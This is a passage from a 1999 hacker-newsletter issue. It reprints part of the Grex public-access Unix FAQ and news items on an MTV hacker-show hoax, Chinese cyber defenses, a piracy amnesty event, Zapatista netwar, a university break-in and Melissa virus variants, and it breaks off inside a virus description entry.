        o You don't have DNS working properly. In this case you can connect to Grex
          by using its IP address. See below.
        o You are accessing the net via a firewall which blocks telnet. In this case
          you need to contact your security administrator for the
          LAN which you are accessing the net from, and ask if there is a way to
          telnet through the firewall.
        o Your telnet client is not working properly. You would not be able to
          telnet to any other site, either. Have you tried any? Try
          telnetting to hvcn.org and see if you get a login prompt.
        o Grex is down. This happens occasionally. You can usually tell if Grex is
          down by trying to access the web site. Try reloading
          to eliminate the possibility of a cached page. This won't be a good test
          if your connection uses a caching proxy server.
        o If it is none of the above, send mail to The Grex Staff and explain
          everything you tried, and also please specify the IP address
          and the GMT time that your attempt failed. If you can provide the results
          of a ping or traceroute from your end, that may prove to be helpful, too.
       
      * Can I do a ping or traceroute from Grex?
       
      These tools are not available on Grex. Vandals were using them to attack other
      sites. This is a ludicrous thing to do from Grex,
      because Grex is so tiny that its CPU and net connection become overloaded long
      before any other system would even begin to
      notice that it was being attacked. But people were doing it anyway, and
      hurting Grex. Regrettably, the actions of a few thoughtless
      people has forced Grex to disable these potentially valuable network analysis
      tools.
       
      You may be able to use a remote traceroute server on the web. See
      http://www.traceroute.org/.
       
      * What is Grex's IP address?
       
      At the time this answer was last updated, the IP address of Grex was
      204.212.46.130, IP addresses may change at any time. In
      general we have little control over changes to our IP address. You should
      always use the hostname, because if the IP address does
      change, the DNS (Domain/Name Service) lookup of the hostname should produce
      the new IP address. If you unsure if a problem is
      due to DNS, you can test to see if you can connect using our IP address.
      However, if you can, it is strongly recommended that you
      resolve the problem you are having with DNS, so that you do not have to rely
      on inherently unreliable IP addresses.
       
      * Why does the "who" command show numeric IP addresses for some users?
       
      That is because this information is stored in a file (utmp) which only permits
      16 characters of storage for this information. If the IP
      address exceeds 16 characters when converted to text form, then it is stored
      (and reported) only in its numeric form. This affects
      other commands besides the "who" command, such as the "finger" and "last"
      commands.
       
      * How much disk space can I use and how can I determine how much I am using?
       
      We ask folks to keep their disk usage under a megabyte. You can find out how
      much disk space you are using (in kilobytes) by
      running the following command in your home directory:
       
          du -sk
       
      The number that comes back is the number of kilobytes of disk you are using.
      If you are using more than 1024, please remove files.
       
      If you are thinking of putting something big in your account, please talk to
      the Grex staff (staff@cyberspace.org) first. There aren't
      many good reasons to put big things in your Grex account: Grex doesn't allow
      multimedia files on its web pages (not even gifs and
      jpegs), and most of the useful programs that will actually run on Grex are
      already installed on Grex. So please talk to the staff first.
       
      * Why doesn't my arrow key work, so I can edit previous commands in sh?
       
      This is because Grex is running a real sh, and that is a feature not supported
      by sh. What some Unix systems call sh is actually
      bash, an enhanced version of the sh shell which does this. If you would like
      to use bash instead, you should change your shell on
      Grex to bash. You can do that by running the change command.
       
      * Why can't I edit previous commands in tcsh? It is supposed to support it.
       
      Tcsh does support previous line editing. Emacs conventions for command-line
      editing is the default at most sites, though Grex uses
      vi as the default for command-line editing. So you have two options: If you
      are handy with vi, hit escape to jump into command
      mode, then start editing your line as you would with vi. The second option is
      to type
       
          set -o emacs
       
      at the prompt. After that, you should be able to edit your command line in a
      way that is familiar to you. If you prefer to always use
      emacs as your command-line editor, then you'll want to place the "set -o
      emacs" line in your .login file.
       
      * Why does the last line of each page of text disappear from the screen before
      I can read it?
       
      This happens when Grex doesn't know how many rows of text are on your screen.
      The easiest way to set this correctly is to run the
      "change" program on Grex. It will count rows for you and display the correct
      number at the top of your screen (sometimes it can take
      some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and
      make the necessary changes to your startup files so
      that your settings will be right in the future. To run the change program,
      type "change" at a shell prompt, or "!change" from a menu or
      PicoSpan. Then select "change terminal type" and follow the menus from there.
       
      * Why do the bottom lines stay on the screen in the editor while the rest
      scroll normally?
       
      Same problem. Wrong number of lines in the setting. See solution above.
       
      * Why doesn't "screen" work when I disconnect from Grex?
       
      Grex runs a special daemon that kills all user processes when a user logs out.
      This prevents users from running servers or robots of
      any kind. It also prevents them from using the reconnect feature of screen
      (although the other features work fine). The reason for this
      policy is to prevent users from consuming our limited resources while not
      logged in.
       
      * I found a huge core file in my account. What should I do?
       
      Nothing really. This is a file that gets created if a program fails (crashes).
      It is intended to help the programmer find whatever bug
      caused the failure. If not renamed, these files will be deleted automatically
      in a day or two. You can delete it if you wish. By the way,
      a core file usually doesn't take up as much space on the disk as it appears
      to, because it is "sparse" (full of empty space).
       
      * How does the system decide where to put my home directory?
       
      Grex uses a hierarchical arrangement of home directories to keep the directory
      sizes from growing too large and thus becoming
      inefficient. So, on Grex, home directories are always located by a path of
      this form:
       
          /x/y/z/username
       
      The x is the disk letter, the y is the first letter of the username, and the z
      is the second letter of the username. Currently we have two
      disks that user accounts occupy, /a and /c (/b was not available). When we add
      a third disk, some users will be assigned on /d. The
      choice of disk is determined when your account is created, and this choice is
      switched back and forth manually by the staff to keep
      the available disk space balanced.
       
      The environment variable $HOME should always be set to the full path of your
      home directory. The ~ symbol may also be used as a
      shorthand for your home directory, as long as your shell supports it. (The
      Bourne Shell does not.)
       
      * Where can I get a self-contained multi-user chat program for my linux box?
       
      You might want to try out Grex's party program. See the Party Question in this
      FAQ.
       
      * I know something about Unix. How can I help the Grex staff?
       
      We are always delighted to have new volunteers One of the things that Grex
      needs most urgently is more people to answer "write
      help" requests. It is recommended that you check out the helpers conference.
      To turn on your helper flag, run the Unix command
      "mesg -h y".
       
      Also you should read the Grex Staff Note on the topic of volunteering to be on
      the Grex staff.
       
      ----------------------------------------------------------------------------
      Last updated January 17, 1999 (srw)
      > telnet 24.x.x.x
       
      Sorry!  You need to be a *validated member* of Grex to use outbound internet
      services, including ftp and telnet, to connect to anything other than Grex
      itself.  To find out how to become a *member*, type "support" (without the
      quotes) at almost any prompt, or !support at the telnet or ftp prompt.
      To become a *validated* member, either pay for your membership with a personal
      check, or include a photocopy of a driver's license or other official ID along
      with your membership payment, or send mail to aruba (Grex's treasurer) to work
      out some other way of identifying yourself.  Membership costs $6/month - cheap!
       
      Grex has lots of options that are available to non-members.  Try typing
      "bbs" to join the conferences, or "menu" or "lynx" for two different menu
      systems that help you to find many options that you *can* use.
       
      If you have questions about Grex, you can find answers by joining the Info
      conference.  (Type "bbs info" to get there).  Or send mail to "staff".
       
      Thanks for trying out Grex!
       
      Trying x.x.x.x ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> quit
      > exit
      logout
       
       
      @HWA       
      
10.0  Shamrock Says it Was All A Lie 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Pulling the SHAM out of SHAMrock... The much hyped and much talked about show
      on MTV "True Life: I'm a hacker" is exposed for the media circus it was and 
      Shamrock from the weekly 'underground' web-tv news show PARSE (linked to from
      our site and can be seen at http://www.biztechtv.com/parse) explains in a 
      statement how he took the  folks from MTV for a ride and helped perpetrate the
      myth presented by MTV that all hackers are drug taking criminals, it should be
      noted that Shamrock could use a spell (and grammar) checker in his otherwise 
      interesting comments on the whole fiasco. - Ed
      
      From HNN http://www.hackernews.com/ 


      contributed by Shamrock The recent MTV special "True Life: I'm a Hacker" 
      has caused quite a stir in the underground community. Now it seems that 
      most of what was aired was just made up fiction anyway. A statement 
      received by HNN from Shamrock, one of the people profiled in the show, 
      alleges that a good chunk of the show was a farce put on by him to see 
      just how gullible MTV was.  

      (We aren't sure what to make of this. Is this the ultimate media hack or a 
      childish prank that makes us all look bad? And why no verification by 
      MTV?) 

      Statement From Shamrock http://www.hackernews.com/orig/shamrock.html

      Comments About the Show From HNN Readers 
      http://www.hackernews.com/orig/mtv.html

      True Life: I'm a Hacker             
      http://www.mtv.com/mtv/tubescan/truelife/

      Shamrock's statement;       ~~~~~~~~~~~~~~~~~~~~

      The following statement was received by HNN from       Shamrock in 
      regardes to the MTV television special True Life: I'm a Hacker 



      Well, first I'd like to apoligize to the hacker community for giving MTV 
      viewers a bad impression of what hacking is about. No doubtly this fiasco 
      has taught you all what you should've already known, MTV and the media are 
      completely full of shit. They don't care about giving an acurate depiction 
      of what's happening in the world. Remember this is "television 
      programming". They care only about sensationalism and soft drink 
      advertising. 

      I also owe the hacker community an explanation for what you saw on the 
      show. There was mention in one of the HNN responses about "MTV was looking 
      for someone guliable enough...." and thats what I assumed from the 
      beginning, but I thought "could they be guliable enough themselves to 
      actually air and credit themselves to the production of something like 
      that?". I thought if they could, would there be any way that they would 
      still be able to maintain credibility as journalists? I didnt think so. I 
      also didn't think that when they asked if we could show them what types of 
      crime take place in the hacker world that they would actually expect to 
      see that. I also didn't think that they would take anything we showed them 
      seriously. 

      Apon our first meeting with MTV I told them about what kind of work we do 
      at pseudo.com as far as web broadcasting goes and told them about other 
      hacker related Internet resources they should check out. They were 
      referred to 2600, HNN, Defcon and L0pht. With that left the way it was I 
      figured that there would be no excuse for MTV not being able to produce an 
      interesting special on hacker culture. 

      Surprisenly (or not) they contacted us a few weeks later stating that they 
      were not satisfied with what they had already gathered from other groups 
      that had approached. They wanted more and at this point it becomes 
      apparent that this wasnt being taken seriously (or if it was, they must be 
      as guliable as they think we are). So we decided to take them for a ride 
      (NOTE: at this point it was understood what was at risk, we had no 
      intention of making hackers look bad. We waited for months to see if they 
      would be realistic and after it was obvious that they wouldn't we figured 
      the only option would be to discredit them with as much fiction as 
      possible). The question was how far would they go. We already had our cast 
      of charactures, next we needed we our plot. After setting the mood and 
      introducing the compelling focus of our adventure we wanted to give them a 
      climax. Unfortunatly, the part where we deliver the disk to the rival 
      group and the police (which we had paid off) showed up and arrested our 
      counterparts didnt make it into the MTV production. It's a shame too 
      because we reallly wanted to see if we could actually get them to pay for 
      and produce our own original presentation without them even knowing it. 

      Sadly, our hoax didnt even come close to what we had intended. All I can 
      do is reiterate to you just how fake and hollow what you see on television 
      is. After this experience I wonder where if any truth lies in what we are 
      told to watch, read and listen to. This is the obvious issue the hacker 
      community needs to address. If the nation's intellectiual lowest common 
      denomanator (television/music/etc audiences) and the media that caters to 
      them are sucessful using programming to shape what their opinions are and 
      what behavior they should endorse, is this not the same prolem that exists 
      when our governments are utilizing technology as a means to control its 
      population? 

      If the media is knowenly skewing issues that are fact based to leave its 
      audience with an unfounded impression of the truth, is it not the duty to 
      those who know better to discredit the false source and to provide the 
      audience with the rest of the facts? Isn't this similar to a situation 
      where a government is developing or employing technology in a form that 
      violates our rights to privacy and the public that is embrassing it 
      unaware of what is really happening? or high techonology industries that 
      capitalize on a public that pays for products or services that fall short 
      of its claim's? 

      I think it would be very hard for anyone with a brain to take MTV 
      seriously now and I hope noone does. I also hope that now this leaves open 
      the opprotunity for a source to emerge that will be everything that the 
      mainstream media isn't. I also hope this source encompasses everything 
      that HNN, HNC and the other various hacker resources (which should've been 
      feartured in the first place) are about. 

      Oh yeah, your also probably asking yourself what the fuck is this 
      parsetv.com shit all about? Do you really think that we are some kind of 
      "information security resource"? or "hacker culture outlet"? No. We're 
      entertainment. We use the web as a form of free speech to do whatever the 
      hell we want in an effort to entertain the people that watch us. Any 
      issues related to the hacker community that we follow, we do so as an 
      obligation to web community as a whole. If there is a vulnerability that 
      exists we share it because its probably in our viewers best interest to 
      know so, as far learning more about it or getting further detail all we 
      can do is refer the audience to the proper source for that information. If 
      an issue is brought up related to the laws and regulations that relate to 
      the web, we feature it also due to the fact that it's in the best interest 
      of all web users to know. 

      We do not claim to be the "consultants" or "experts" that other people 
      claim to be (and are in fact not, um JP). My personal interest in 
      computers and technology is just that, personal interest. I got interested 
      in hacking and it's culture because I wanted learn more about it and its 
      relation to the everyday world that non-hackers live in. Not everyone that 
      read's 2600 or goes to Defcon does so because they want to be a hacker, or 
      grow up to work in IT. Everyone has their own reasons. I think to many of 
      you I represent a much bigger concern of yours and thats the growing 
      number of non-hackers that have an interest in hacking but don't follow 
      the traditional roles. Well get use to it because you can expect to see 
      alot more of that as the web grows. As the web becomes more and more 
      assimulated in our everyday lives, there will more and more people out 
      there getting interested in hacking "FO ALL DA WRONG REASONS". All the 
      hacker community can do about it is provide a responsable model for the 
      ones who take it more seriously than others. The others will just become 
      what they were to begin with, irrelavent to what hackers are really tring 
      to do. I wholeheatly apoligize to those offended. The issues that hackers 
      are out there tring to address are some of the most important issues that 
      face the country, but it seems that the wrong people are listening and the 
      right people are not. There is no doubt that the messages hackers are 
      tring to convey need to be heard by the rest of the country, just don't 
      expect that to happen through mainstream media. Mainstream media is 
      content with keeping mainstream audiences ignorant and without 
      discrediting what the media is saying, the ignorant will continue to 
      listen. 

      @HWA


11.0  China Fortifies Cyber Defenses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by Ir0nMaiden 
      [Translated from Chinese]
      The Ministry of Information Industry, Ministry of Public
      Security, and Ministry of State Security in Hong Kong
      issued a joint memorandum urging all state and private
      organizations to not connect internal computer systems
      to the world wide internet. This is in direct response to
      the threat of cyber attack from Taiwanese intruders.
      The Ministry of Information and Industry have also
      established the China Computer Network Security
      Management Center. Fearing that imported computers
      and software may contain security holes, Trojan Horses,
      or Backdoors the ministry is also asking that the
      development of domestically-made computers and
      software systems be increased. 
      
      Hong Kong Ming Pao
      http://www.mingpao.com/newspaper/
      (Chinese)
      
      @HWA
      
12.0  Amnesty Program for Pirated Software Fails Miserably 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      An amnesty program for pirated software, sponsored by
      Microsoft and Adobe, failed to get even one copy of
      pirated software. While several people went to the
      event for the free t-shirts and other goodies, not one
      person showed up with software they thought might
      have been pirated. 

      SF Gate
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/10/16/BU18704.DTL
      

      S.F. Treasure Hunt for Pirated
      Software Flops
      Rally for turn-ins fails to produce
      any of the illegal booty 

      Benny Evangelista, Chronicle Staff Writer 
                                              
                     Saturday, October 16, 1999 



               

      Microsoft Corp. attorney Anne Murphy was hoping people who were using 
      pirated software would drop on by Justin Herman Plaza to turn in their 
      illegal booty. 

      But to perhaps nobody's surprise but her own, yesterday's mildly 
      publicized ``Ask If It Is Licensed'' event did not draw one single 
      repentant soul. 

      There were plenty of folks who came for the free T-shirts and free 
      software. And at least one man was more concerned about a different sort 
      of intergalactic fraud. 

      Maybe Microsoft should have called the event ``Ask, But Don't Tell.'' 

      ``We're disappointed,'' said Murphy, the chief anti-piracy enforcement 
      official for the Redmond, Wash., software colossus. She said a similar 
      event in San Diego drew about 40 computer sellers who wanted to see if 
      their software was legit, and ``the vast majority was counterfeit.'' 

      Microsoft and publishing software-maker Adobe Systems of San Jose 
      sponsored the event to publicize how consumers can tell if their software 
      was illegally copied and to evangelize about the evils of piracy. 

      The companies weren't there to throw violators in the slammer but would 
      have exchanged genuine software for illegal copies. Then the illegal 
      programs would serve as evidence to hunt down the real perpetrators -- the 
      people who actually copied and sold the software. 

      Piracy cost the California economy an estimated 18,000 jobs and $244 
      million in lost tax revenue in 1998. The estimated rate of illegal 
      software installed statewide last year was about 29 percent, about eight 
      percentage points higher than in 1997. 

      Software piracy includes both individuals and companies that make and 
      distribute illegal copies of legal software and criminals who make and 
      sell counterfeit software. 

      In a separate ceremony in Palo Alto, Gov. Gray Davis signed an executive 
      order setting government policy for state agencies to use only legal 
      copies of software. President Clinton signed a similar order covering 
      federal agencies a year ago. 

      Yesterday, Microsoft also filed federal suits against four Northern 
      California computer sellers, including one in Fremont. Microsoft has filed 
      more than 160 similar suits nationwide in the past year. 

      The people who drifted by during the four-hour event mostly appeared to be 
      workers enjoying the midday sun rather than software desperadoes. 

      Passers-by interviewed agreed that using illegal software was bad, 
      although only a few said they would actually walk up to Microsoft 
      admitting their deed if they were. Some even ranked shoplifting a candy 
      bar as a worse crime. 

      One 29-year-old accountant from Dublin happily admitted sharing his copy 
      of Chessmaster 3000 with 10 friends. 

      ``I bought it, and I can give it to my friends if I want,'' said the man, 
      who didn't want to give out his name for fear Microsoft enforcers ``would 
      get bored one day and send their legal team after me.'' 

      Frank Chu, 39, of Oakland didn't care about software at all. He was trying 
      to get in front of television cameras with a sign that read, ``Impeach 
      Clinton. 12 Galaxies Guiltied to A Techtronic Rocket Society.'' 

      ``Clinton has freely committed treason against 12 galaxies,'' Chu 
      explained. 

      Murphy hoped no one would take the free software given to a select few in 
      the crowd and make copies.

      ``For someone to learn about piracy and then go out and negatively impact 
      the California economy would be a little bit cheeky,'' Murphy said. 

      Australian tourist Quentin Chester said software piracy wasn't high on his 
      list of concerns. 

      ``In Australia, we don't tend to be fussed about this stuff,'' said 
      Chester, 41. ``Australians are pretty laid back.''     
      
      @HWA
      
13.0  A New Look at InfoWar 
      ~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/

      contributed by M0ney 
      Is Cyberwarfare about Denial of Service Attacks, web
      page defacements, and network break-ins? Or is it more
      about Information dissemination, media manipulation and
      good ole propaganda? The Zapatista guerrillas, fighting
      for their freedom in Mexico, use the Internet to their
      advantage but not in a way you might think. 

      Time      
      http://www.pathfinder.com/time/magazine/articles/0,3266,32558,00.html
      

      TIME SPECIAL REPORT/THE COMMUNICATIONS REVOLUTION/ LANGUAGES OF TECHNOLOGY 
      OCTOBER 11, 1999 VOL. 154 NO. 15 

      Wired For Warfare Rebels and dissenters are using the power of the Net to 
      harass and attack their more powerful foes BY TIM MCGIRK/MEXICO CITY

      In the Chiapas jungles of southern Mexico during the mid-1990s, Zapatista 
      guerrillas--fighting for the rights of Mayan peasants--evolved a new 
      method of conflict: "cyberwar." A mode of battle that involves the 
      Internet and other forms of telecommunication, cyberwar, or Netwar, is 
      employed with increasing frequency by rebels, terrorists and governments 
      around the world. A Netwar can be pure propaganda, recognition that modern 
      conflicts are won as much by capturing headlines as by capturing 
      territory. But a Netwar can have more dangerous applications when computer 
      viruses or electronic jamming are used to disable an enemy's defenses, as 
      both Serb and NATO hackers proved in Kosovo by unleashing barrages of 
      propaganda and attempting to bring down each others' telecommunications 
      systems.

      When they rebelled in 1994, the poorly armed Zapatistas were no match for 
      the Mexican army in Chiapas. But their spokesman, Subcomandante Marcos, is 
      an agile media manipulator. A renegade college professor who hides his 
      face in a ski mask, Marcos titled his Ph.D. dissertation The Power of the 
      Word. In the battle for public sympathy, he knows his laptop is a more 
      effective weapon than an AK-47 Kalashnikov rifle. Using a network of 
      universities, churches and non-governmental organizations (NGOs) in 
      Mexico, the U.S. and Canada--all linked through the Internet--Marcos 
      mobilized international pressure to make the government cease its assaults 
      against the Zapatistas. When the Mexican army declared in December 1994 
      that it had surrounded the 12,000 rebels, Marcos dispatched news that the 
      Zapatistas had slipped out of the trap and conquered dozens of villages. 
      It wasn't true, but according to cyberwar specialists the Zapatistas' 
      disinformation campaign caused enough confusion to help touch off a run on 
      the peso, plunging Mexico into recession.

      The Zapatistas' tactics also attracted the attention of military 
      strategists. The U.S. Army, for one, sponsored a 1998 study on the group's 
      tactics by the Rand think-tank. "Marcos is not a computer geek," says John 
      Arquilla, a defense information expert at the U.S. Naval Postgraduate 
      School in Monterey and co-author of the Rand report The Zapatista Social 
      Netwar in Mexico. "He's more committed to the idea of info revolution."

      That revolution is spreading. These days missiles are not only tipped with 
      warheads but with video cameras; television and radio deliver war news as 
      it happens; and alleged eyewitness accounts of battles and massacres 
      appear on the Internet, quickly finding their way into other media. What 
      matters in today's combat, says Arquilla, "is whose story wins." Not 
      surprising, then, that 12 of the 30 terrorist organizations identified by 
      the U.S. State Department have their own websites. Armies are also 
      entering this digital arena. Sweden's leading military college recently 
      graduated several infowar specialists, and the American military academy 
      West Point is expected to add cybercombat to its curriculum.

      In Netwar, governments are often at a disadvantage against rebel groups or 
      terrorists. Since they are hierarchies, governments are digital sitting 
      ducks, easy prey for electronic attacks. Groups like the Zapatistas and 
      Burmese dissidents fighting the military regime in Rangoon, on the other 
      hand, use swarms of loosely organized "hacktivists" to strike at 
      governmental computer networks. The hackers strike, then swiftly disperse 
      into cyberspace. The rebels' electronic battle station is seldom inside 
      the country they are targeting, and tracing it back through the Net can be 
      like trying to find the door in a hall of mirrors. The Zapatistas' first 
      websites, for example, were based in the U.S., while Colombia's 
      Revolutionary Armed Forces (FARC) guerrillas are in Europe, and Serb Net 
      propagandists relied on sympathizers in Eastern Europe during the Kosovo 
      crisis.

      One of the most novel weapons in the Zapatistas' digital arsenal is the 
      Electronic Disturbance Theater, which operates out of New York City. These 
      Net activists specialize in virtual sit-ins. Using a JavaScript tool 
      called FloodNet, the group organizes thousands of online protesters to 
      invade a Mexican government website with up to 600,000 hits a minute, 
      normally bringing it to a grinding halt. "We're not into blowing people up 
      or hacking sites," says one of the Theater's founders, Ricardo Dominguez. 
      "We just want to create a small force field that will disturb the pace of 
      power." He predicts that soon peasant farmers in Chiapas will be able to 
      protect themselves from assaults by security forces with "wireless video 
      uploads" that can secretly record incidents of police or army brutality 
      and transmit live on the Internet. According to Dominguez, this would 
      enable viewers to circulate the faces and badge numbers of assailants to 
      human rights groups

      
      The art of Netwar is rapidly advancing. Cyberwar is "in its early stages," 
      says the U.S. Naval Postgraduate School's Arquilla, "but it's the 
      harbinger of a new kind of warfare." According to Dorothy Denning, a 
      professor of computer science at Georgetown University, the Kosovo 
      conflict was "the first war fought on the Internet." Air strikes targeted 
      television and radio stations controlled by the Serbs, but NATO 
      deliberately spared the four Internet servers in Yugoslavia from its 
      bombardments. The aim was to let Yugoslavs tap into news on the conflict 
      free from Serb censorship. But this ploy backfired. The Yugoslav 
      government seized control of the servers and used them to pour out 
      pro-Serb propaganda. Their aim, nearly successful, was to weaken the 
      resolve of NATO countries.

      No challenge to NATO's domination of the skies, the Serbs held their own 
      in the Internet trenches. Serb hackers also used the servers and satellite 
      links left intact by NATO to break into government and industry computers 
      belonging to members of the alliance, disrupting services and defacing 
      websites. NATO hackers did the same to Serb sites. Serb computer experts 
      also lobbed "e-mail bombs" at U.S. government facilities, clogging the 
      systems.

      Digital sabotage is rife in Asia, too. In the week after the results of 
      East Timor's referendum on independence were announced, the Department of 
      Foreign Affairs received hundreds of e-mail "letter bombs" designed to 
      disable government computers. "Without a firewall, [the e-mail] would have 
      contaminated the system," says a source within the department. In Taiwan 
      and China, supporters and opponents of Taiwan's bid for statehood 
      regularly hack into and deface each other's websites.

      Some Netwar experts concede the limitations of this kind of combat. 
      Jamming governmental websites may be a nuisance to the Mexicans, for 
      example, but it is unlikely to scare the administration into surrendering 
      to the Zapatistas. Nevertheless, argues Georgetown's Denning, "An 
      electronic petition with a million signatures may influence policy more 
      than an attack that disrupts emergency services."

      Others, like Zapatista activist Dominguez, view cyberwar as a more 
      civilized alternative to blood-and-guts fighting. "I'd much rather see 
      extremists take down an Internet server than go around killing people," he 
      says. For the Zapatistas, fighting a Netwar may have saved them from 
      extermination, winning the rebels widespread international support. Marcos 
      often compares himself to the cartoon character Speedy Gonzalez. Like this 
      quick-witted mouse, Marcos used the Internet to run rings around his 
      bigger foes. His comrades in other countries may well follow his lead. 

      --WITH REPORTING BY JASON
       TEDJASUKMANA/JAKARTA
      
      @HWA
      
            
14.0  Another Security Challenge 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Yazmon 
      The Shanghai Waigaoqiao Free Trade Zone Network
      Development Co. is offering a whopping $600 (5,000
      yuan) to anyone who can defeat the security of its
      website within the next week. (I hope companies aren't
      thinking that this sort of thing will actually test
      anything.) 

      Reuters- (Url outdated)
      
      @HWA
      
15.0  University Shutdown After Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      Wittenberg University in Columbus OH, had to
      completely shut down their web and email system after
      an electronic break in. During the shutdown the school
      installed various security improvements that make it
      harder for off-campus students to use the school's
      e-mail. The alleged attack occurred Sept. 12 and was
      traced to Australia. 

      Associated Press- via Cleveland Plain Dealer      
      http://www.cleveland.com/news/pdnews/metro/oa17hac.ssf
      
      Hackers force college to close Web,
      e-mail servers 

      Monday, October 18, 1999

      By ANDREW WELSH-HUGGINS ASSOCIATED PRESS

      COLUMBUS - Hackers who invaded Wittenberg University's computers last 
      month forced the institution to shut down its e-mail system and Web site. 
      Their attack also resulted in security improvements that make it harder 
      for off-campus students to use the school's e-mail.

      University President Baird Tipson said the attack occurred Sept. 12 and 
      was traced to Australia. The hackers also struck at least three other Ohio 
      colleges in the same assault.

      "The major cost has been enormous amounts of our computing staff time that 
      we desperately needed," Tipson said. "We're all trying to make sure we're 
      Y2K compliant. We believe that we are now, but we wouldn't have taken two 
      or three weeks of their time to spend on this project."

      Tipson revealed details of the attack as he testified before lawmakers 
      about the need for using part of Ohio's $10.1 billion tobacco settlement 
      to pay for more technology for colleges.

      Wittenberg, with 2,060 students, is a private liberal arts university in 
      Springfield.

      Joe Deck, director of computing services at Wittenberg, said the attack 
      occurred just before noon on a Sunday.

      He said several employees of his department were working on Y2K compliance 
      systems and noticed intruders in the system after about 10 minutes.

      They immediately shut down the university's Web and e-mail servers and 
      isolated Wittenberg's connection to the Internet.

      Deck said the hackers' expertise was "very well organized" and said he 
      chose not to let them stay in the system longer, even though that might 
      have increased the chance of identifying the culprits.

      Since then, university employees have spent at least 2,000 hours 
      rebuilding passwords, improving the software "firewall" that protects the 
      system and putting other security precautions into effect.

      From users' perspective, things are back to normal, although work on 
      internal systems still needs to be done, Deck said.

      Deck, Tipson and other officials would not identify the other three Ohio 
      colleges attacked. Tipson said the work Wittenberg did in reaction to the 
      attack cost in the "low six figures."

      Economics Professor Jeff Ankrom said he uses the Internet extensively in 
      his classes.

      For about two weeks, "I felt almost immobilized," Ankrom said. "My Web 
      site for classes was frozen in time, and I found myself being locked into 
      the old mode of doing things, making announcements in class, handing out 
      slips of paper, worrying about who got them, who didn't."

      Wittenberg junior Ethan Grefe said the situation was a serious problem for 
      off-campus students, since they weren't able to access their e-mail for 
      several days.

      "At first, I think the general atmosphere was one of astonishment, that 
      somebody from Australia came and hacked into our system. It was just kind 
      of weird," said the 20-year-old from Toledo. "As it went
      on for a couple of weeks, people were getting pretty
      aggravated."
      
16.0  More Melissa Strains 
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      Melissa.U, Melissa.V, and VBS.Freelink are new Melissa
      strains that are spreading across the internet. While this
      article doesn't provide any new information it does give
      some background as to what has been going on in the
      AV world recently. 

      Yahoo News      
      http://dailynews.yahoo.com/h/zd/19991016/tc/19991016310.html
      
      Saturday October 16 03:36 PM EDT

      Melissa-like viruses haunt firms

      Robert Lemos, ZDNet

      Spiritual descendents of the Melissa computer virus have appeared over the 
      last month, haunting at least 10 companies, according to anti-virus firms. 

      Recently, two variants of the Melissa virus -- Melissa.U and Melissa.V -- 
      and VBS.Freelink, a Visual Basic script virus with a Melissa-like MO, have 
      been infecting the unprepared. 

      Just ask Design Continuum Inc., a West Newton, Mass.-based industrial 
      design firm that spent 40 man-hours cleaning up after a recent virus 
      outbreak. 

      Two weeks ago, Tim Cronin, Design Continuum's director of business 
      development, received an e-mail from a client with the subject line "Check 
      this." Without thinking, Cronin opened the attachment, which was infected 
      with       VBS.Freelink. 

      "Within 45 minutes, I looked back at my screen and saw 60 messages from 
      outside sources asking what had I done, and my IS (information systems) 
      manager was on the phone asking me what had happened," Cronin told       
      ZDNN in an interview. 

      VBS.Freelink is a relatively benign virus that spreads quickly, but does 
      not damage data. Still, in spreading, the virus can create quite a bit of 
      carnage, said Cronin. By the time he realized what had happened, all 85 of 
      the firm's       employees had received the attachment and enough had 
      opened the e-mail that the company's servers quickly filled to 
      overflowing, rejecting incoming messages. 

      "We invested at least a man-week in cleaning it up (over four days)," he 
      said. 

      E-mailed from trusted source       Design Continuum -- and its unnamed 
      clients -- had fallen victim to the trick that made Melissa so virulent: 
      its packaging. "I received the original e-mail from a source that I 
      recognized as my client, so I felt trusting enough to open (the 
      attachment)," he said. 

      In fact, the social engineering was so good that, when several recipients' 
      anti-virus software deleted the infected mail, they wrote back to Cronin, 
      asking him to re-send the document. 

      "There is a good bet that I would have been immune as well if I had 
      updated my anti-virus suite," he said. 

      Lull between storms?       Design Continuum seems to be in the minority, 
      however. Overall, companies and home users alike seem to have taken to 
      heart the lessons of Melissa: Be suspicious of all attachments and 
      regularly update your anti-virus software. 

      "The shock value of Melissa was good for education," said Chengi "Jimmy" 
      Kuo, director of ant-virus research for security software firm Network 
      Associates Inc. "Corporations are much more attuned to e-mail-based 
      viruses.       Anytime they hear about a virus, they want to know about it 
      and get a cure immediately." 

      Anti-virus firm and NAI rival Trend Micro Inc. reported only six companies 
      infected with the Melissa variants in the past week; four others have been 
      hit with Freelink. "We are just in the 'Variations on a Theme' period 
      right       now," said Susan Orbuch, director of communications for Trend 
      Micro. 

      The anti-virus firms regard the past few months as a lull between storms. 

      "It takes a while for virus writers to come out with something new," said 
      NAI's Kuo. "Most viruses are by virus writers who have taken the code and 
      tweaked it." 

      While a "tweaked" computer virus may not be identified by anti-virus 
      software due to its different fingerprint, all major anti-virus software 
      also has heuristics to pick out modified viruses. 

      "The recent viruses are nasty (more destructive) than Melissa," said Trend 
      Micro's Orbuch, "but our heuristics are catching them because they are 
      only variants -- they are not new." 

      Luck is a large factor as well. Anti-virus vendors who find out about a 
      virus before it enters the wild can limit any damage and distribute new 
      detection data -- known as "definitions" -- for their software. 

      Yet, while the current crop of code being generated by virus writers is 
      not original, the anti-virus firms are worried that some virus writer will 
      learn how to make a true e-mail virus -- one that does not require the 
      user to act at       all. 

      "There are techniques for attacking directly -- without needing the user 
      to open an attachment," said NAI's Kuo. "Such (Melissa-like) viruses are 
      not out of the picture yet." 
      
      
      -=-
      

      VBS.Freelink 

              Aliases:
                     Freelink, VBS.Freelink
      Area of Infection:
                     \Windows and \Windows\System folder
           Likelihood:
